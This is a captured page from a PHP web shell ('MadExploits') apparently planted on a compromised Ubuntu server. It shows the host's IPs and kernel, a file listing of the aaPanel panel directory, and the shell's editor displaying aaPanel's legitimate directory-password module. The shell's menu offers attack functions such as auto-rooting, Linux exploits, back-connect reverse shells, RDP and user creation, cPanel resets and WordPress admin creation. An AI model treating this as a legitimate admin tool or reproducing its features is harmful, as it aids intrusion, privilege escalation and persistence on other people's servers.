Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 18.220.23.205
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
www /
server /
panel /
class_v2 /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
btdockerModelV2
[ DIR ]
drwxr-xr-x
crontabModelV2
[ DIR ]
drwxr-xr-x
databaseModelV2
[ DIR ]
drwxr-xr-x
firewallModelV2
[ DIR ]
drwxr-xr-x
logsModelV2
[ DIR ]
drwxr-xr-x
monitorModelV2
[ DIR ]
drwxr-xr-x
panelModelV2
[ DIR ]
drwxr-xr-x
power_mta
[ DIR ]
drwxr-xr-x
projectModelV2
[ DIR ]
drwxr-xr-x
safeModelV2
[ DIR ]
drwxr-xr-x
safe_warning_v2
[ DIR ]
drwxr-xr-x
ssl_domainModelV2
[ DIR ]
drwxr-xr-x
virtualModelV2
[ DIR ]
drwxr-xr-x
wp_toolkit
[ DIR ]
drwxr-xr-x
acme_v3.py
133.98
KB
-rw-r--r--
ajax_v2.py
95.41
KB
-rw-r--r--
apache_v2.py
17.28
KB
-rw-r--r--
backup_bak_v2.py
24.86
KB
-rw-r--r--
breaking_through.py
47.94
KB
-rw-r--r--
cloud_stora_upload_v2.py
19.27
KB
-rw-r--r--
common_v2.py
12.45
KB
-rw-r--r--
config_v2.py
165.36
KB
-rw-r--r--
crontab_ssl_v2.py
1.85
KB
-rw-r--r--
crontab_v2.py
111.93
KB
-rw-r--r--
data_v2.py
36.54
KB
-rw-r--r--
database_v2.py
125.54
KB
-rw-r--r--
datatool_v2.py
5.83
KB
-rw-r--r--
db_mysql_v2.py
11.41
KB
-rw-r--r--
db_v2.py
11.04
KB
-rw-r--r--
dk_db.py
18.34
KB
-rw-r--r--
download_file_v2.py
2.54
KB
-rw-r--r--
fastcgi_client_two_v2.py
12.26
KB
-rw-r--r--
fastcgi_client_v2.py
6.89
KB
-rw-r--r--
file_execute_deny_v2.py
10.34
KB
-rw-r--r--
files_v2.py
149.12
KB
-rw-r--r--
firewall_new_v2.py
22.4
KB
-rw-r--r--
firewalld_v2.py
11.09
KB
-rw-r--r--
firewalls_v2.py
17.44
KB
-rw-r--r--
flask_compress_v2.py
5.12
KB
-rw-r--r--
flask_sockets_v2.py
3.75
KB
-rw-r--r--
ftp_log_v2.py
21.72
KB
-rw-r--r--
ftp_v2.py
16.17
KB
-rw-r--r--
http_requests_v2.py
24.25
KB
-rw-r--r--
jobs_v2.py
36.98
KB
-rw-r--r--
letsencrypt_v2.py
12.85
KB
-rw-r--r--
log_analysis_v2.py
12.23
KB
-rw-r--r--
monitor_v2.py
13.53
KB
-rw-r--r--
one_key_wp_v2.py
75.79
KB
-rw-r--r--
panelControllerV2.py
4.97
KB
-rw-r--r--
panelDatabaseControllerV2.py
5.76
KB
-rw-r--r--
panelDockerControllerV2.py
5.86
KB
-rw-r--r--
panelFireControllerV2.py
4.65
KB
-rw-r--r--
panelModControllerV2.py
5.13
KB
-rw-r--r--
panelProjectControllerV2.py
6.07
KB
-rw-r--r--
panelSafeControllerV2.py
4.65
KB
-rw-r--r--
panel_api_v2.py
10.43
KB
-rw-r--r--
panel_auth_v2.py
33.21
KB
-rw-r--r--
panel_backup_v2.py
102.56
KB
-rw-r--r--
panel_dns_api_v2.py
22.2
KB
-rw-r--r--
panel_http_proxy_v2.py
11.33
KB
-rw-r--r--
panel_lets_v2.py
43.61
KB
-rw-r--r--
panel_mssql_v2.py
4.48
KB
-rw-r--r--
panel_mysql_v2.py
7.55
KB
-rw-r--r--
panel_php_v2.py
24.78
KB
-rw-r--r--
panel_ping_v2.py
2.88
KB
-rw-r--r--
panel_plugin_v2.py
125.11
KB
-rw-r--r--
panel_push_v2.py
23.78
KB
-rw-r--r--
panel_redirect_v2.py
34.02
KB
-rw-r--r--
panel_restore_v2.py
11.04
KB
-rw-r--r--
panel_site_v2.py
343.73
KB
-rw-r--r--
panel_ssl_v2.py
75.34
KB
-rw-r--r--
panel_task_v2.py
28.7
KB
-rw-r--r--
panel_video_V2.py
1.88
KB
-rw-r--r--
panel_warning_v2.py
68.71
KB
-rw-r--r--
password_v2.py
8.09
KB
-rw-r--r--
plugin_auth_v2.py
3.14
KB
-rw-r--r--
plugin_deployment_v2.py
28.85
KB
-rw-r--r--
san_baseline_v2.py
51.13
KB
-rw-r--r--
site_dir_auth_v2.py
17.67
KB
-rw-r--r--
ssh_security_v2.py
45.66
KB
-rw-r--r--
ssh_terminal_v2.py
58.86
KB
-rw-r--r--
system_v2.py
44.77
KB
-rw-r--r--
userRegister_v2.py
6.74
KB
-rw-r--r--
user_login_v2.py
21.2
KB
-rw-r--r--
vilidate_v2.py
4.94
KB
-rw-r--r--
wxapp_v2.py
5.62
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : site_dir_auth_v2.py
#coding: utf-8 #------------------------------------------------------------------- # aaPanel #------------------------------------------------------------------- # Copyright (c) 2015-2017 aaPanel(www.aapanel.com) All rights reserved. #------------------------------------------------------------------- # Author: zhwen <zhw@aapanel.com> #------------------------------------------------------------------- #------------------------------ # 站点目录密码保护 #------------------------------ import public,re,os,json,shutil from public.validate import Param class SiteDirAuth: # 取目录加密状态 def __init__(self): self.setup_path = public.GetConfigValue('setup_path') self.conf_file = self.setup_path + "/panel/data/site_dir_auth.json" # 读取配置 def _read_conf(self): conf = public.readFile(self.conf_file) if not conf: conf = {} public.writeFile(self.conf_file,json.dumps(conf)) return conf try: conf = json.loads(conf) if not isinstance(conf,dict): conf = {} public.writeFile(self.conf_file, json.dumps(conf)) except: conf = {} public.writeFile(self.conf_file, json.dumps(conf)) return conf def _write_conf(self,conf,site_name): c = self._read_conf() if not c or site_name not in c: c[site_name] = [conf] else: if site_name in c: c[site_name].append(conf) public.writeFile(self.conf_file,json.dumps(c)) def _check_site_authorization(self,site_name): webserver=public.get_webserver() conf_file = "{setup_path}/panel/vhost/{webserver}/{site_name}.conf".format( setup_path=self.setup_path, site_name=site_name,webserver=webserver) if "Authorization" in public.readFile(conf_file): return True # 设置目录加密 def set_dir_auth(self,get): ''' get.name auth_name get.site_dir auth_dir get.username username get.password password get.id site id :param get: :return: ''' # 校验参数 try: get.validate([ Param('site_dir').String(), Param('name').String(), Param('username').String(), Param('password').String(), Param('id').Integer(), ], [ public.validate.trim_filter(), ]) except Exception as ex: public.print_log("error info: {}".format(ex)) return public.return_message(-1, 0, str(ex)) # if len(get.username) < 3 or len(get.password) < 3: # return public.return_msg_gettext(False, public.lang("Username or password cannot be less than 3 characters")) # name = get.name param = self.__check_param(get) if param['status']==-1: return param param = param['message'] password = param['password'] username = param['username'] name = param['name'] site_dir = get.site_dir if public.get_webserver() == "openlitespeed": return public.return_message(-1, 0, public.lang("OpenLiteSpeed is currently not supported")) # if not hasattr(get,"password") or not get.password or not hasattr(get,"username") or not get.username: # return public.return_msg_gettext(False, public.lang("Please enter an account or password")) if not get.site_dir: return public.return_message(-1, 0, public.lang("Please enter the directory to be protected")) if not get.name: return public.return_message(-1, 0, public.lang("Please enter the Name")) passwd = public.hasPwd(password) site_info = self.get_site_info(get.id) site_name = site_info["site_name"] if self._check_site_authorization(site_name): return public.return_message(-1, 0, public.lang("Site password protection has been set, please cancel and then set. Site directory --> Password access")) if self._check_dir_auth(site_name, name,site_dir): return public.return_message(-1, 0, public.lang("Directory has been protected")) auth = "{user}:{passwd}".format(user=username,passwd=passwd) auth_file = '{setup_path}/pass/{site_name}'.format(setup_path=self.setup_path,site_name=site_name) if not os.path.exists(auth_file): os.makedirs(auth_file) auth_file = auth_file+"/{}.pass".format(name) public.writeFile(auth_file,auth) # 配置独立认证文件 self.set_dir_auth_file(site_info["site_path"],site_name,name,username,site_dir,auth_file) # 配置站点主文件 result = self.set_conf(site_name,"create") if result: return public.return_message(0,0,result) # 检查配置 webserver = public.get_webserver() result=self.check_site_conf(webserver,site_name,name) if result: return public.return_message(0,0,result) # 写配置 conf = {"name":name,"site_dir":get.site_dir,"auth_file":auth_file} self._write_conf(conf,site_name) public.serviceReload() return public.return_message(0, 0, public.lang("Successfully created")) # 检查配置是否存在 def _check_dir_auth(self, site_name, name,site_dir): conf = self._read_conf() if not conf: return False if site_name in conf: for i in conf[site_name]: if name in i.values() or site_dir == i["site_dir"]: return True # 获取当前站点php版本 def get_site_php_version(self,siteName): try: conf = public.readFile(self.setup_path + '/panel/vhost/'+public.get_webserver()+'/'+siteName+'.conf'); if public.get_webserver() == 'nginx': rep = r"enable-php-(\w{2,5})\.conf" tmp = re.search(rep,conf) if not tmp: rep = r"enable-php-(\d+-wpfastcgi).conf" re.search(rep, conf) else: rep = r"php-cgi-(\w{2,5})\.sock" tmp = re.search(rep,conf).groups() if tmp: return tmp[0] else: return "" except: return public.return_msg_gettext(False, public.lang("Apache2.2 does NOT support MultiPHP!")) # 获取站点名 def get_site_info(self,id): site_info = public.M('sites').where('id=?', (id,)).field('name,path').find() return {"site_name":site_info["name"],"site_path":site_info["path"]} def change_dir_auth_file_nginx_phpver(self,site_name,phpv,auth_name): file_path = "{setup_path}/panel/vhost/nginx/dir_auth/{site_name}/{auth_name}.conf".format( setup_path=self.setup_path,site_name=site_name,auth_name=auth_name) conf = public.readFile(file_path) if not conf: return False if phpv == 'other': php_conf = "include /www/server/panel/vhost/other_php/{}/enable-php-other.conf;".format(site_name) else: php_conf = 'include enable-php-{}.conf;'.format(phpv) rep = r"include\s+(enable-php-\w+|/www/server/panel/vhost/other_php/{}/enable-php-other)\.conf;".format(site_name) conf = re.sub(rep,php_conf,conf) public.writeFile(file_path,conf) # 设置独立认证文件 def set_dir_auth_file(self,site_path,site_name,name,username,site_dir,auth_file): php_ver = self.get_site_php_version(site_name) php_conf = "" if php_ver: if php_ver == 'other': php_conf = "include /www/server/panel/vhost/other_php/{}/enable-php-{}.conf;".format(site_name,php_ver) else: php_conf = "include enable-php-{}.conf;".format(php_ver) for i in ["nginx","apache"]: file_path = "{setup_path}/panel/vhost/{webserver}/dir_auth/{site_name}" if i == "nginx": # 设置nginx conf = '''location ~* ^%s* { #AUTH_START auth_basic "Authorization"; auth_basic_user_file %s; %s #AUTH_END }''' % (site_dir,auth_file,php_conf) else: # 设置apache conf = '''<Directory "{site_path}{site_dir}"> #AUTH_START AuthType basic AuthName "Authorization " AuthUserFile {auth_file} Require user {username} #AUTH_END SetOutputFilter DEFLATE Options FollowSymLinks AllowOverride All #Require all granted DirectoryIndex index.php index.html index.htm default.php default.html default.htm </Directory>'''.format(site_path=site_path,site_dir=site_dir,auth_file=auth_file,username=username,site_name=site_name) conf_file = file_path.format(setup_path=self.setup_path,site_name=site_name,webserver=i) if not os.path.exists(conf_file): os.makedirs(conf_file) conf_file = conf_file + '/{}.conf'.format(name) public.writeFile(conf_file,conf) # 设置apache配置 def set_conf(self,site_name,act): for i in ["nginx", "apache"]: dir_auth_file = "%s/panel/vhost/%s/dir_auth/%s/*.conf" % (self.setup_path,i,site_name,) file = self.setup_path + "/panel/vhost/{}/".format(i) + site_name + ".conf" shutil.copyfile(file, '/tmp/{}_file_bk.conf'.format(i)) if os.path.exists(file): conf = public.readFile(file) if i == "apache": if act == "create": rep = "IncludeOptional.*\\/dir_auth\\/.*conf(\n|.)+<\\/VirtualHost>" rep1 = "</VirtualHost>" if not re.search(rep, conf): conf = conf.replace(rep1, "\n\t#Directory protection rules, do not manually delete\n\tIncludeOptional {}\n</VirtualHost>".format( dir_auth_file)) else: rep = "\n*#Directory protection rules, do not manually delete\n+\\s+IncludeOptional[\\s\\w\\/\\.\\*]+" conf = re.sub(rep, '', conf) public.writeFile(file, conf) else: if act == "create": rep = "#SSL-END(\n|.)+include.*\\/dir_auth\\/.*conf;" rep1 = "#SSL-END" if not re.search(rep,conf): conf = conf.replace(rep1, rep1 + "\n\t#Directory protection rules, do not manually delete\n\tinclude {};".format(dir_auth_file)) else: rep = "\n*#Directory protection rules, do not manually delete\n+\\s+include[\\s\\w\\/\\.\\*]+;" conf = re.sub(rep, '', conf) public.writeFile(file, conf) # 验证站点配置 def check_site_conf(self,webserver,site_name,name): isError = public.checkWebConfig() auth_file = "{setup_path}/panel/vhost/{webserver}/dir_auth/{site_name}/{name}.conf".format(setup_path=self.setup_path,webserver=webserver,site_name=site_name,name=name) if (isError != True): os.remove(auth_file) # a_conf = self._read_conf() # for i in range(len(a_conf)-1,-1,-1): # if site_name == a_conf[i]["sitename"] and a_conf[i]["proxyname"]: # del a_conf[i] return public.return_msg_gettext(False, public.lang('ERROR: %s<br><a style="color:red;">' % public.lang("Configuration ERROR") + isError.replace("\n", '<br>') + '</a>')) # 删除密码保护 def delete_dir_auth(self,get): ''' get.id get.name :param get: :return: ''' try: get.validate([ Param('name').String(), Param('id').Integer(), ], [ public.validate.trim_filter(), ]) except Exception as ex: public.print_log("error info: {}".format(ex)) return public.return_message(-1, 0, str(ex)) name = get.name site_info = self.get_site_info(get.id) site_name = site_info["site_name"] conf = self._read_conf() if site_name not in conf: return public.return_message(-1,0,"The website does not exist in the configuration:{}",(site_name,)) for i in range(len(conf[site_name])): if name in conf[site_name][i].values(): print(conf[site_name][i]) del(conf[site_name][i]) if not conf[site_name]: del(conf[site_name]) break public.writeFile(self.conf_file,json.dumps(conf)) for i in ["nginx", "apache"]: file_path = "{setup_path}/panel/vhost/{webserver}/dir_auth/{site_name}/{name}.conf".format(webserver=i, setup_path=self.setup_path, site_name=site_name, name=name) os.remove(file_path) if not conf: self.set_conf(site_name,"delete") if not hasattr(get,'multiple'): public.serviceReload() return public.return_message(0, 0, public.lang("Successfully deleted!")) # 修改目录保护密码 def modify_dir_auth_pass(self,get): ''' get.id get.name get.username get.password :param get: :return: ''' # 校验参数 try: get.validate([ Param('name').String(), Param('username').String(), Param('password').String(), Param('id').Integer(), ], [ public.validate.trim_filter(), ]) except Exception as ex: public.print_log("error info: {}".format(ex)) return public.return_message(-1, 0, str(ex)) # if not hasattr(get,"password") or not get.password or not hasattr(get,"username") or not get.username: # return public.return_msg_gettext(False, public.lang("Username or password cannot be less than 3 characters")) param = self.__check_param(get) if param['status']==-1: return param param = param['message'] password = param['password'] username = param['username'] name = get.name site_info = self.get_site_info(get.id) site_name = site_info["site_name"] passwd = public.hasPwd(get.password) auth = "{user}:{passwd}".format(user=get.username,passwd=passwd) auth_file = '{setup_path}/pass/{site_name}/{name}.pass'.format(setup_path=self.setup_path,site_name=site_name,name=name) public.writeFile(auth_file,auth) public.serviceReload() return public.return_message(0, 0, public.lang("Setup successfully!")) # 获取目录保护列表 def get_dir_auth(self,get): ''' get.id get.sitename :param get: :return: ''' # 校验参数 try: get.validate([ Param('id').Integer(), ], [ public.validate.trim_filter(), ]) except Exception as ex: public.print_log("error info: {}".format(ex)) return public.return_message(-1, 0, str(ex)) if not hasattr(get, 'siteName'): site_info = self.get_site_info(get.id) site_name = site_info["site_name"] else: site_name = get.siteName conf = self._read_conf() if site_name in conf: return public.return_message(0,0,{site_name:conf[site_name]}) return public.return_message(0,0,{}) def __check_param(self, get): values = {} if hasattr(get, "password"): if not get.password: return public.return_message(-1, 0, public.lang("Please enter password!")) password = get.password.strip() if len(password) < 3: return public.return_message(-1, 0, public.lang("Password cannot be less than 3 characters")) if re.search(r'\s', password): return public.return_message(-1, 0, public.lang("Password cannot contain spaces")) values['password'] = password if hasattr(get, "username"): if not get.username: return public.return_message(-1, 0, public.lang("Please enter username!")) username = get.username.strip() if len(username) < 3: return public.return_message(-1, 0, public.lang("Username cannot be less than 3 characters")) if re.search(r'\s', username): return public.return_message(-1, 0, public.lang("Username cannot contain spaces")) values['username'] = username if hasattr(get, "name"): if not get.name: return public.return_message(-1, 0, public.lang("Please enter a name!")) name = get.name.strip() if len(name) < 3: return public.return_message(-1, 0, public.lang("Name cannot be less than 3 characters")) if re.search(r'\s', name): return public.return_message(-1, 0, public.lang("Name cannot contain spaces")) if re.search('[\\/\"\'\\!@#$%^&*()+={}\\[\\]\\:\\;\\?><,./\\\\]+', name): return public.return_message(-1, 0, public.lang("Name format must be [ aaa_bbb ]")) values['name'] = name return public.return_message(0,0, values)
Close
